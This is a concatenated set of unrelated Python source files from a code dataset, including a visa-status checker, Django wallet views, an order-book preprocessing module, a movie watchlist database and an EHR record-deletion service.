soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblSubmitDate\").text\n StatusDate = soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblStatusDate\").text\n Message = soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblMessage\").text\n assert caseno == case_no \n return (status,SubmitDate,StatusDate,Message), soup\n\n\ndef query_ceac_state_safe(loc, case_no, info, soup=None):\n #decrypt addition_info by RSA\n try:\n plaintext = private_key.decrypt(\n base64.b64decode(info),\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n passport_number, surname = plaintext.decode().split(\",\")\n except Exception as e:\n return ERR_DECRYPT, None\n \n for _ in range(5):\n try:\n data = get_post_data(soup)\n result, soup = query_ceac_state(loc, case_no, passport_number, surname, data)\n logger.info(\"Info!,%s-%s: %s\",loc, case_no, result)\n except Exception as e:\n import traceback\n traceback.print_exc()\n logger.error(\"Error!,%s-%s: %s\",loc, case_no, e)\n return str(e), None\n if result != ERR_CAPTCHA:\n break\n else:\n time.sleep(1)\n return result, soup\n\n\ndef main_handler(req):\n ret = {}\n soup = None\n for loc, case_no, info in req:\n result, soup = query_ceac_state_safe(loc, case_no, info, soup)\n ret[case_no] = result\n return json.dumps(ret)\n\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nclass RequestProxyHandler(BaseHTTPRequestHandler):\n '''\n This class is used to handle the request from API Gateway to unwarp the request\n the request body is a json string, which contains json of the RAW request.\n\n Example of warpped request:\n POST /event-invoke HTTP/1.1\n Host: 11.148.165.112:10217\n User-Agent: Go-http-client/1.1\n Content-Length: 495\n Accept-Encoding: gzip\n Content-Type: application/json\n X-Forwarded-For: 11.163.0.86\n X-Real-Ip: 11.163.0.86\n X-Scf-Appid: 1252245989\n X-Scf-Memory: 512\n X-Scf-Name: ceac-serverless\n X-Scf-Namespace: default\n X-Scf-Region: na-siliconvalley\n X-Scf-Request-Id: 3b21a413-6e6a-11ee-b2ba-52540008c7f7\n X-Scf-Timeout: 300000\n X-Scf-Uin: 100000090134\n X-Scf-Version: $LATEST\n Connection: close\n\n Formated Body of warpped request:\n {\n \"body\": \"\",\n \"headers\": {\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"accept-encoding\": \"gzip, deflate, br\",\n \"accept-language\": \"en-US,en;q=0.7,zh;q=0.3\",\n \"upgrade-insecure-requests\": \"1\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0\"\n },\n \"httpMethod\": \"GET\",\n \"path\": \"/\",\n \"queryString\": {}\n }\n '''\n\n def do_POST(self):\n\n playload_raw = self.rfile.read(int(self.headers[\"Content-Length\"]))\n playload = json.loads(playload_raw)\n\n if playload[\"httpMethod\"] != \"POST\":\n self.send_response(400)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(b\"Only support POST!\")\n self.wfile.flush()\n return\n \n event = json.loads(playload[\"body\"])\n ret = main_handler(event)\n\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n self.wfile.write( ret.encode() )\n self.wfile.flush()\n\n\ndef run(server_class=HTTPServer, handler_class=RequestProxyHandler):\n server_address = ('', 9000)\n httpd = server_class(server_address, handler_class)\n httpd.serve_forever()\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n run()\n\n# def test():\n# logging.basicConfig(level=logging.INFO)\n# loc = \"BEJ\"\n# case_no = \"AA00A38G49\"\n# info = \"vCGK/uopJta8UicG223ySZ6OnzYUp3dZAUTFw/Jzi9VulsVY1CNUy2NOZ4Bl2859tPu68nvWKVuWAHbPHfwPXpsshiWBCdwsdfFfC7GnrtERvdK8boghJ9m/7QStJz/rIQEHTw5K0GI7OY2XGbuXjB85I9cbcA5ppSfZuSKxYBkq4+vk9nMGOvsMEX09Bg4BqFhWSNkW/pgdm2jntFgT6Xzi00e1mPWv8chdgEiqhmp5C/tJLkcu9A5KqVTnlIRan3ytMkMIaslerqrKggMPtjBeNwCTlOY/9lyyYOsV8qK/qFjf2CtPL2TFaPHycIOKLP3caB0F2/+d/CD3PF+IRQ==\"\n# print(query_ceac_state_safe(loc, case_no, info))\n\n# if __name__ == \"__main__\":\n# test()","repo_name":"yuzeming/CEACStatTracker","sub_path":"CEAC-serverless/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"76"} +{"seq_id":"73950645684","text":"#2106 양다연\n\nfrom animal import 동물\n\nclass 돼지(동물):\n def __init__(self, name):\n super().__init__(name)\n self.다리수 = 4\n self.특징 = \"돼지코\"\n self.울음소리 = \"꿀꿀\"\n\n def __str__(self):\n return super().__str__() + f', 특징: {self.특징}, 다리수: {self.다리수}개'\n\nif __name__ == '__main__':\n 동물2 = 돼지(\"저팔계\")\n 동물2.울다()\n print(동물2)\n\n#2106 양다연","repo_name":"yday05506/ProgrammingPython","sub_path":"2106 양다연_수행평가/pig.py","file_name":"pig.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19050382904","text":"from django.shortcuts import render,redirect\nfrom django.views.generic.base import View\nfrom email import message\nfrom .forms import *\nfrom rest_framework import views\nfrom rest_framework.response import Response\n\n# Create your views here\ndef home_page(request):\n return render(request,\"Wallet/index.html\")\n\ndef register_customer(request):\n if request.method=='POST':\n form=CustomerRegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n else:\n form=CustomerRegistrationForm()\n return render(request,\"Wallet/register_customer.html\",{\"form\":form})\n\ndef customer_profile(request,id):\n customers=Customer.objects.get(id=id)\n return render(request,\"Wallet/customer_profile.html\",{\"customers\":customers })\ndef edit_customer(request,id):\n customer=Customer.objects.get(id=id)\n if request.method =='POST':\n form=CustomerRegistrationForm(request.POST,instance=customer)\n if form.is_valid():\n form.save()\n return redirect(\"customerProfile\",id=customer.id)\n else:\n form=CustomerRegistrationForm(instance=customer)\n return render(request,\"Wallet/edit_customer.html\",{\"forms\":form})\n\nclass SearchCustomer(View):\n model = Customer\n template_name = 'Wallet/list_customers.html'\n\n def get(self,request):\n customers=Customer.objects.all()\n customer_found=request.GET.get('customer_found',None) #request takes form as customer_found \n if customer_found:\n result=Customer.objects.filter(first_name__contains=customer_found) #filter from database and assign it tothe request \n context={'Customers':result}\n return render(request, self.template_name,context) #return result\n context={'Customers':customers}\n return render(request, self.template_name,context) \n\ndef register_account(request):\n if request.method==\"POST\":\n form_account=CustomerAccountForm(request.POST)\n if form_account.is_valid():\n form_account.save()\n else:\n form_account=CustomerAccountForm()\n return render(request,'Wallet/list_accounts.html',{\"form\":form_account} )\n\ndef list_accounts(request):\n accounts=Account.objects.all()\n return render(request,'Wallet/list_accounts.html',{\n \"accounts\":accounts})\n\ndef account_profile(request,id):\n account=Account.objects.get(id=id)\n return render(request,\"Wallet/account_profile.html\",{\"accounts\":account})\n\ndef edit_account(request,id):\n account=Account.objects.get(id=id)\n if request.method == \"POST\":\n form=CustomerAccountForm(request.POST,instance=account)\n if form.is_valid():\n form.save()\n return redirect(\"accountProfile\",id=account.id)\n else:\n form=CustomerAccountForm(instance=account)\n return render(request,\"Wallet/edit_account.html\",{\"forms\":form})\n\ndef register_wallet(request):\n if request.method==\"POST\":\n form_wallet=CustomerWalletForm(request.POST)\n if form_wallet.is_valid():\n form_wallet.save()\n else:\n form_wallet=CustomerWalletForm()\n return render(request,\"Wallet/customer_wallet.html\", {\"wallet\":form_wallet} )\n\ndef wallet_profile(request,id):\n wallet=Wallet.objects.get(id=id)\n return render(request,\"Wallet/account_profile.html\",{\"wallets\":wallet})\ndef edit_wallet(request,id):\n wallet=Wallet.objects.get(id=id)\n if request.method==\"POST\":\n form=CustomerWalletForm(request.POST,instance=wallet)\n if form.is_valid():\n form.save()\n return redirect(\"walletProfile\",id=wallet.id)\n else:\n form=CustomerWalletForm(instance=wallet)\n return render(request,\"Wallet/edit_wallet.html\",{\"forms\":form})\n\n\ndef list_wallet(request):\n wallet=Wallet.objects.all()\n return render(request,\"wallet/list_wallets.html\",{\"wallet\":wallet})\n\ndef register_transaction(request):\n if request.method==\"POST\":\n form_transact=CustomerTransactionForm(request.POST)\n if form_transact.is_valid():\n form_transact.save()\n else:\n form_transact=CustomerTransactionForm()\n return render(request,\"Wallet/transaction.html\", {\"transact\":form_transact})\n\ndef list_transaction(request):\n transactions=Transaction.objects.all()\n return render(request,\"Wallet/list_transactions.html\",{\"transactions\":transactions})\n\ndef register_card(request):\n card_form=CustomerCardForm()\n if request.method==\"POST\":\n card_form=CustomerCardForm(request.POST)\n if card_form.is_valid():\n card_form.save()\n else:\n card_form=CustomerCardForm()\n return render(request,\"Wallet/card.html\",{\"card\":card_form})\ndef transaction_profile(request,id):\n transaction=Transaction.objects.get(id=id)\n return render(request,\"Wallet/transaction_profile.html\",{\"transactions\":transaction})\ndef edit_transaction(request,id):\n transaction=Transaction.objects.get(id=id)\n if request.method==\"POST\":\n form=CustomerTransactionForm(request.POST,instance=transaction)\n if form.is_valid():\n form.save()\n return redirect(\"transactionProfile\",id=transaction.id)\n else:\n form=CustomerTransactionForm(instance=transaction)\n return render(request,\"Wallet/edit_transaction.html\",{\"forms\":form})\n \ndef list_card(request):\n card=Card.objects.all()\n return render(request,\"Wallet/list_cards.html\",{\"cards\":card})\ndef card_profile(request,id):\n card=Card.objects.get(id=id)\n return render(request,\"Wallet/card_profile.html\",{\"cards\":card})\n\ndef edit_card(request,id):\n card=Card.objects.get(id=id)\n if request.method==\"POST\":\n form=CustomerCardForm(request.POST,instance=card)\n if form.is_valid():\n form.save()\n return redirect(\"cardProfile\",id=card.id)\n else:\n return render(request,\"Wallet/edit_card.html\",{\"forms\":form})\n\ndef register_thirdparty(request):\n if request.method==\"POST\":\n thirdparty_form=ThirdPartyForm(request.POST)\n if thirdparty_form.is_valid():\n thirdparty_form.save()\n else:\n thirdparty_form=ThirdPartyForm()\n return render(request,\"Wallet/thirdparty.html\",{\"third\":thirdparty_form})\n\ndef list_thirdparty(request):\n thirds=ThirdParty.objects.all()\n return render (request,'Wallet/list_thirdparties.html',{\"thirdpartys\":thirds})\n\ndef register_notification(request):\n if request.method==\"POST\":\n form_notify=CustomerNotificationForm(request.POST)\n if form_notify.is_valid():\n form_notify.save()\n else:\n form_notify=CustomerNotificationForm()\n return render(request,\"Wallet/notification.html\",{\"notify\":form_notify})\n\ndef notification_list(request):\n notification=Notification.objects.all()\n return render (request,'Wallet/list_notifications.html',{\"notifications\":notification})\n\ndef register_loan(request):\n if request.method==\"POST\":\n loan_form=LoanForm(request.POST)\n if loan_form.is_valid():\n loan_form.save()\n else:\n loan_form=LoanForm()\n return render(request,\"Wallet/loan.html\",{\"loan\":loan_form} )\n\ndef list_loan(request):\n loan=Loan.objects.all()\n return render(request,'Wallet/list_loan.html',{\"loans\":loan})\n\ndef register_reward(request):\n if request.method==\"POST\":\n reward_form=RewardForm(request.POST)\n if reward_form.is_valid():\n reward_form.save()\n else:\n reward_form=RewardForm()\n return render(request,\"Wallet/transaction_reward.html\",{\"reward\":reward_form}\n )\n\ndef list_reward(request):\n reward=Reward.objects.all()\n return render(request,\"Wallet/list_rewards.html\",{\"rewards\":reward})\n\ndef register_receipt(request):\n if request.method==\"POST\":\n receipt_form=TransactionRecieptForm(request.POST)\n if receipt_form.is_valid():\n receipt_form.save()\n else:\n receipt_form=TransactionRecieptForm()\n return render(request,\"Wallet/transaction_reciept.html\", {\"receipt\":receipt_form})\n\ndef list_receipts(request):\n reciept=Reciept.objects.all()\n return render(request,\"Wallet/list_reciepts.html\",{\"receipts\":reciept})\n\ndef receipt_profile(request,id):\n reciept=Reciept.objects.get(id=id)\n return render(request,\"Wallet/reciept_profile.html\",{\"reciepts\":reciept})\n\ndef edit_receipts(request,id):\n receipt=Reciept.objects.get(id=id)\n if request.method==\"POST\":\n form=TransactionRecieptForm(request.POST,instance=receipt)\n if form.is_valid():\n form.save()\n return redirect(\"receiptProfile\",id=receipt.id)\n else:\n form=TransactionRecieptForm(instance=receipt)\n return render(request,\"Wallet/edit_reciept.html\",{\"forms\":form})\n ","repo_name":"prudenceAhimbisibwe/Digital-Wallet","sub_path":"Wallet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70271510325","text":"\"\"\"\nМодуль для нахождения минимального кол-ва ходов для одного коня.\n\nИспользуется подсчета минимального кол-ва ходов в случае, если по шахматной доске ходит один конь,\nна основании данных, полученних в модуле input_data (координаты двух точек)\n\nФ-я knight_move() - нахождение кол-ва ходов\n\"\"\"\n\n\ndef knight_move(start: tuple[int, int], finish: tuple[int, int]) -> int:\n \"\"\"\n Эта функция считает количество ходов, необходимое коню, чтобы\n добраться из одной клетки шахматной доски до другой.\n\n :param start: кортеж (два целых числа - начальная координата коня)\n :param finish: кортеж (два целых числа - конечная координата коня)\n :return: целое число (кол-во ходов, которое необходимое сделать коню)\n\n >>> knight_move((1,1), (1,1))\n 0\n >>> knight_move((1,2), (6,4))\n 3\n \"\"\"\n step = [[100 for _ in range(0,13)] for _ in range(0,13)]\n step[start[0]+1][start[1]+1] = 0\n for _ in range(0,9):\n for i in range(2, 10):\n for j in range(2, 10):\n if step[i][j] > 0:\n step[i][j] = min(step[i+2][j+1], step[i-2][j-1],\n step[i-1][j-2], step[i+1][j+2],\n step[i+2][j-1], step[i-2][j+1],\n step[i+1][j-2], step[i-1][j+2])+1\n answer = step[finish[0]+1][finish[1]+1]\n return answer\n","repo_name":"green1937/VVPD6","sub_path":"package/knight_move.py","file_name":"knight_move.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36813945918","text":"import glob\nimport easyocr\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom PIL import Image as PILImage\nfrom wand.image import Image\nimport io\nimport os\n# Imports the Google Cloud client library\nfrom google.cloud import vision\nfrom AVALIA_TEXTO import verifica_conformidade_pepsi\n\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r' '\n\n#FUNCAO API GOOGLE VISION\ndef detect_text_only(path):\n \"\"\"Detects text in the file.\"\"\"\n from google.cloud import vision\n import io\n client = vision.ImageAnnotatorClient()\n\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.Image(content=content)\n\n response = client.text_detection(image=image)\n texts = response.text_annotations \n \n if response.error.message:\n raise Exception(\n '{}\\nFor more info on error messages, check: '\n 'https://cloud.google.com/apis/design/errors'.format(\n response.error.message))\n \n if len(texts)>0:\n\n vertices = (['({},{})'.format(vertex.x, vertex.y)\n for vertex in texts[0].bounding_poly.vertices]) \n return vertices\n\n else:\n return \"Impossível Identificar\"\n\n\n\n\nimg_path = './V154/Pepsi/TRATADO/denoised_amostra6_5.png'\nimg = cv2.imread(img_path)\nvertices = detect_text_only(img_path)\n\nx1 = int(vertices[0][1:4])\ny1 = int(vertices[0][5:8])\nx2 = int(vertices[2][1:4])\ny2 = int(vertices[2][5:8])\n\ntop_left = (x1,y1)\nbottom_right = (x2,y2)\n\nprint(top_left)\nprint(bottom_right)\n\nimg = cv2.rectangle(img, top_left, bottom_right, (0,255,0), 2)\n\ncv2.imshow(\"resultado\", img)\n\ncv2.waitKey(0)\n","repo_name":"GabSouza98/tcc","sub_path":"GoogleVisionAPI_DetectText.py","file_name":"GoogleVisionAPI_DetectText.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35743656649","text":"import dask\nimport numpy as np\nimport pandas as pd\n\n\n@dask.delayed\ndef extract_features(orderbook_file_path: str) -> pd.DataFrame:\n \"\"\"\n Given the orderbook file path, this function extracts\n key information for computing micro price predictions.\n First, it calculates bid-ask spreaad, mid price, bid-ask imbalance.\n Note that this function resamples above quantities by 1 second frequency.\n\n Args:\n orderbook_file_path (str): orderbook_file path\n\n Returns:\n pd.DataFrame: a dataframe containing necessary quantities.\n \"\"\"\n df = pd.read_csv(orderbook_file_path)[\n [\n \"timestamp\",\n \"asks[0].price\",\n \"bids[0].price\",\n \"asks[0].amount\",\n \"bids[0].amount\",\n ]\n ]\n\n # calculate mid price and bidask spread\n df[\"mid_price\"] = (df[\"asks[0].price\"] + df[\"bids[0].price\"]) / 2\n df[\"ba_spread\"] = np.round((df[\"asks[0].price\"] - df[\"bids[0].price\"]), 5)\n df[\"imbalance\"] = df[\"bids[0].amount\"] / (\n df[\"bids[0].amount\"] + df[\"asks[0].amount\"]\n )\n\n df[\"timestamp\"] = pd.to_datetime(df[\"timestamp\"] / 1000, unit=\"ms\")\n\n # convert timestamp to datetime format\n df = df[[\"timestamp\", \"mid_price\", \"ba_spread\", \"imbalance\"]].set_index(\"timestamp\")\n\n # resample by 1second frequency\n df = df.resample(\"1s\").last().ffill()\n return df\n\n\n@dask.delayed\ndef extract_quotes(trade_file_path: str) -> pd.DataFrame:\n df = pd.read_csv(trade_file_path)[\n [\"timestamp\", \"ask_price\", \"bid_price\", \"ask_amount\", \"bid_amount\"]\n ]\n df[\"timestamp\"] = pd.to_datetime(df[\"timestamp\"] / 1000, unit=\"ms\")\n return df.set_index(\"timestamp\")\n\n\n@dask.delayed\ndef extract_trades(trade_file_path: str) -> pd.DataFrame:\n df = pd.read_csv(trade_file_path)[[\"timestamp\", \"side\", \"price\", \"amount\"]]\n df[\"timestamp\"] = pd.to_datetime(df[\"timestamp\"] / 1000, unit=\"ms\")\n return df.set_index(\"timestamp\")\n\n\ndef symmetrize_data(\n df_feature: pd.DataFrame,\n numSpreads: int = 4,\n numImbalance: int = 4,\n numdM: int = 2,\n symmetrize: bool = True,\n) -> pd.DataFrame:\n \"\"\"_summary_\n\n Args:\n df_feature (pd.DataFrame): _description_\n numSpreads (int, optional): _description_. Defaults to 4.\n numImbalance (int, optional): _description_. Defaults to 4.\n numdM (int, optional): _description_. Defaults to 2.\n symmetrize (bool, optional): _description_. Defaults to True.\n\n Returns:\n pd.DataFrame: _description_\n \"\"\"\n df_signal = df_feature.copy(deep=True)\n tick_size = df_signal.ba_spread[df_signal.ba_spread != 0].min()\n\n # discretize bidask spread then get next time's bidask spread\n # discretize imbalance and get next imbalance\n df_signal = df_signal[df_signal.ba_spread <= numSpreads * tick_size]\n df_signal[\"ba_spread\"] = np.round(df_signal[\"ba_spread\"].div(tick_size)).astype(int)\n df_signal[\"imbalance\"] = pd.cut(\n df_feature[\"imbalance\"],\n bins=np.arange(numImbalance + 1) / numImbalance,\n labels=np.arange(1, numImbalance + 1),\n ).astype(int)\n\n # calculate change in mid price\n # include data that bidask spread is within 0.2, same goes for\n # mid price change\n df_signal[\"mid_chg\"] = (\n np.round(df_signal[\"mid_price\"].diff().div(tick_size))\n .mul(tick_size)\n .shift(\n -1,\n )\n )\n df_signal = df_signal[abs(df_signal.mid_chg) <= tick_size * numdM]\n\n df_signal[\"next_ba_spread\"] = df_signal[\"ba_spread\"].shift(-1)\n df_signal[\"next_imbalance\"] = df_signal[\"imbalance\"].shift(-1)\n df_signal = df_signal.dropna()\n\n if symmetrize: # make symmetric data\n df_symmetric = df_signal.copy(deep=True)\n df_symmetric[\"imbalance\"] = numImbalance - df_signal[\"imbalance\"] + 1\n df_symmetric[\"next_imbalance\"] = numImbalance - df_signal[\"next_imbalance\"] + 1\n df_symmetric[\"mid_chg\"] = -df_signal[\"mid_chg\"]\n df = pd.concat([df_signal, df_symmetric])\n else:\n df = df_signal\n\n df[[\"next_ba_spread\", \"next_imbalance\"]] = df[\n [\"next_ba_spread\", \"next_imbalance\"]\n ].astype(int)\n return df.dropna()\n","repo_name":"KibeomKimMFE/FBD_Project","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9452317638","text":"import datetime\nimport sqlite3\n\nCREATE_MOVIES_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS movies (\n id INTEGER PRIMARY KEY,\n title TEXT,\n release_timestamp REAL \n);\"\"\"\n\n# There i can add more info about users (their emails, locations etc.)\nCREATE_USERS_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS users(\n username TEXT PRIMARY KEY\n);\"\"\"\n\n# With a foreign key constraint we tell SQL that columns here are referencing other columns\nCREATE_WATCHED_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS watched (\n user_username TEXT,\n movie_id INTEGER,\n FOREIGN KEY (user_username) REFERENCES users(username)\n FOREIGN KEY (movie_id) REFERENCES movies(id)\n);\"\"\"\n\nINSERT_MOVIES = \"INSERT INTO movies (title, release_timestamp) VALUES (?, ?);\"\nINSERT_USER = \"INSERT INTO users (username) VALUES (?)\"\nDELETE_MOVIE = \"DELETE FROM movies WHERE title = ?;\"\nSELECT_ALL_MOVIES = \"SELECT * FROM movies;\"\nSELECT_UPCOMING_MOVIES = \"SELECT * FROM movies WHERE release_timestamp > ?;\"\nSELECT_WATCHED_MOVIES = \"\"\"SELECT movies.* FROM movies\nJOIN watched ON movies.id = watched.movie_id\nJOIN users ON users.username = watched.user_username\nWHERE users.username = ?;\"\"\"\nINSERT_WATCHED_MOVIE = \"INSERT INTO watched (user_username, movie_id) VALUES (?, ?)\"\nSET_MOVIE_WATCHED = \"UPDATE movies SET watched = 1 WHERE title = ?;\"\nSEARCH_MOVIES = \"SELECT * FROM movies WHERE title LIKE ?;\"\nCREATE_RELEASE_INDEX = \"CREATE INDEX IF NOT EXISTS idx_movies_release ON movies(release_timestamp);\"\n\nconnection = sqlite3.connect(\"data.db\") # This allows us to connect to database and creates data.db\n\n\ndef create_tables():\n with connection:\n connection.execute(CREATE_MOVIES_TABLE)\n connection.execute(CREATE_USERS_TABLE)\n connection.execute(CREATE_WATCHED_TABLE)\n connection.execute(CREATE_RELEASE_INDEX)\n\n\ndef add_user(username):\n with connection:\n connection.execute(INSERT_USER, (username,))\n\n\ndef add_movie(title, release_timestamp):\n with connection:\n connection.execute(INSERT_MOVIES, (title, release_timestamp))\n\n\ndef get_movies(upcoming=False): # upcoming = True if we want upcoming, False if we want All movies\n with connection:\n cursor = connection.cursor()\n if upcoming:\n today_timestamp = datetime.datetime.today().timestamp()\n cursor.execute(SELECT_UPCOMING_MOVIES, (today_timestamp,))\n else:\n cursor.execute(SELECT_ALL_MOVIES)\n return cursor.fetchall()\n\n\ndef search_movies(search_term):\n with connection:\n cursor = connection.cursor()\n cursor.execute(SEARCH_MOVIES, (f\"%{search_term}%\",)) # This way it will show \"Matrix\" even if only \"Mat\" typed\n return cursor.fetchall()\n\n\ndef watch_movie(username, movie_id):\n with connection:\n connection.execute(INSERT_WATCHED_MOVIE, (username, movie_id))\n\n\ndef get_watched_movies(username):\n with connection:\n cursor = connection.cursor()\n cursor.execute(SELECT_WATCHED_MOVIES, (username,))\n return cursor.fetchall()\n","repo_name":"Luksos9/PythonSQL","sub_path":"MovieWatchList/moviesdatabase.py","file_name":"moviesdatabase.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39282133898","text":"import git\nimport os\n\n\nclass AvatarRepo(object):\n def __init__(self, directory, repo):\n # Ensure directory exists\n if not os.path.exists(directory):\n print('Creating directory: \"{}\"'.format(directory))\n os.makedirs(directory)\n\n self._directory = self._get_repo_dir(directory, repo)\n self._repo = repo\n self._isvalid = False\n\n def getpath(self):\n return self._directory\n\n def clone(self):\n success = False\n\n print('Cloning repo {}'.format(self._repo))\n\n try:\n git.Repo.clone_from(self._repo, self._directory)\n success = True\n except git.exc.GitCommandError:\n # Assume already cloned\n success = True\n pass\n\n if success:\n self._isvalid = True\n return True\n\n self._isvalid = False\n print('Failed to clone repo')\n return False\n\n def isvalid(self):\n return self._isvalid\n\n @staticmethod\n def _get_repo_dir(directory, repo):\n name = os.path.basename(repo)\n\n # Remove trailing '.git'\n if name[-4:] == '.git':\n name = name[:-4]\n\n return os.path.join(directory, name)\n","repo_name":"garbear/avatarbuilder","sub_path":"avatarbuilder/AvatarRepo.py","file_name":"AvatarRepo.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15674984349","text":"import os\n\nimport pg8000.native\n\nfrom loguru import logger\nfrom exceptions.deletion_verification_exception import DeletionVerificationException\nfrom utilities.database_utilities import get_ehr_repository_database_parameters\n\n\nclass DatabaseService:\n def __init__(self):\n self._ehr_repository_database_parameters = get_ehr_repository_database_parameters()\n self._deletion_interval = os.environ[\"DELETION_INTERVAL\"]\n\n def fetch_all_eligible_records(self) -> list[str]:\n found_records = []\n sql_query = (\"SELECT hr.conversation_id \"\n \"FROM health_records hr \"\n \"WHERE hr.deleted_at IS NOT NULL \"\n f\"AND hr.deleted_at <= (now() - interval '{self._deletion_interval}') \"\n \"GROUP BY hr.conversation_id;\")\n\n with pg8000.native.Connection(**self._ehr_repository_database_parameters.connection_dictionary) as connection:\n for row in connection.run(sql_query):\n found_records.append(str(row[0]))\n\n found_records_length = len(found_records)\n\n if found_records_length > 0:\n logger.info(f\"Found {found_records_length} health records eligible for deletion.\")\n return found_records\n else:\n logger.warning(\"No eligible records were found.\")\n return []\n\n def delete_records_from_ehr_repo_database(self, conversation_ids: list[str]) -> None:\n if len(conversation_ids) == 0:\n return\n\n formatted_conversation_ids = self._format_conversation_ids(conversation_ids)\n\n delete_health_records_sql_query = (\"DELETE FROM health_records hr \"\n \"WHERE hr.conversation_id \"\n f\"IN ({formatted_conversation_ids});\")\n\n delete_messages_sql_query = (\"DELETE FROM messages m \"\n \"WHERE m.conversation_id \"\n f\"IN ({formatted_conversation_ids});\")\n\n with pg8000.native.Connection(**self._ehr_repository_database_parameters.connection_dictionary) as connection:\n connection.run(delete_health_records_sql_query)\n connection.run(delete_messages_sql_query)\n\n self._verify_ehr_repository_records_deleted(conversation_ids)\n\n def _verify_ehr_repository_records_deleted(self, conversation_ids: list[str]) -> None:\n formatted_conversation_ids = self._format_conversation_ids(conversation_ids)\n sql_query = (\"SELECT m.conversation_id \"\n \"FROM messages m \"\n \"WHERE m.conversation_id \"\n f\"IN ({formatted_conversation_ids});\")\n\n with pg8000.native.Connection(**self._ehr_repository_database_parameters.connection_dictionary) as connection:\n unsuccessful_ids = connection.run(sql_query)\n\n if len(unsuccessful_ids) != 0:\n raise DeletionVerificationException(\n \"The following Conversation ID(s) still exist within the EHR Repository database: \"\n f\"{unsuccessful_ids} - these likely will require a manual deletion.\"\n )\n\n else:\n logger.info(f\"Successfully deleted all record(s) for Conversation ID(s) {conversation_ids}.\")\n\n @classmethod\n def _format_conversation_ids(cls, conversation_ids: list[str]):\n formatted_conversation_ids = ', '.join([f\"'{conversation_id}'\" for conversation_id in conversation_ids])\n return formatted_conversation_ids\n","repo_name":"martin-nhs/ehr-deletion-lambda","sub_path":"services/database_service.py","file_name":"database_service.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1717090759","text":"import numpy as np\nimport scipy.stats as stat\nimport sklearn.linear_model as lm\nimport matplotlib.pyplot as plt\n\n\neps = .0001\ntau = .01\n\nN_genes = 100\nN_population = 100000\n\ndef runExperiment(seed):\n rng = np.random.default_rng(seed)\n betas_true = rng.normal(size=N_genes)\n genes_latent = rng.multivariate_normal(np.zeros(N_genes),np.eye(N_genes),\n size=N_population)\n\n quants = np.quantile(genes_latent,1-eps,axis=0)\n\n genes = 1*(genes_latent>quants)\n\n liability_latent = np.dot(genes,betas_true)\n liability_latent_scaled = liability_latent/np.std(liability_latent)\n liability = np.sqrt(1-.2)*liability_latent_scaled + np.sqrt(.2)*rng.normal(size=N_population)\n\n quant_liab = np.quantile(liability,1-tau)\n has_disease = 1.*(liability>quant_liab)\n\n model = lm.LogisticRegression()\n model.fit(genes,has_disease)\n return betas_true,model.coef_\n\ntrial1_true,trial1_learned = runExperiment(1993)\ntrial2_true,trial2_learned = runExperiment(1990)\ntrial3_true,trial3_learned = runExperiment(2021)\ntrial4_true,trial4_learned = runExperiment(2022)\ntrial5_true,trial5_learned = runExperiment(2023)\ntrial6_true,trial6_learned = runExperiment(2024)\ntrial7_true,trial7_learned = runExperiment(2025)\nfs1 = 20\nfs2 = 24\nfs3 = 16\nplt.scatter(trial1_true,trial1_learned,c='deeppink',alpha=.8,label='Trial 1')\nplt.scatter(trial2_true,trial2_learned,c='dodgerblue',alpha=.8,label='Trial 2')\nplt.scatter(trial3_true,trial3_learned,c='gold',alpha=.8,label='Trial 3')\nplt.scatter(trial4_true,trial4_learned,c='lime',alpha=.8,label='Trial 4')\nplt.scatter(trial5_true,trial5_learned,c='indigo',alpha=.8,label='Trial 5')\nplt.scatter(trial6_true,trial6_learned,c='saddlebrown',alpha=.8,label='Trial 6')\nplt.scatter(trial7_true,trial7_learned,c='aqua',alpha=.8,label='Trial 7')\nplt.xlabel('Latent effect on liability',fontsize=fs1)\nplt.ylabel('Regression Coefficient',fontsize=fs1)\nplt.title('True vs estimated coefficients .0001',fontsize=fs2)\nplt.legend(loc='upper 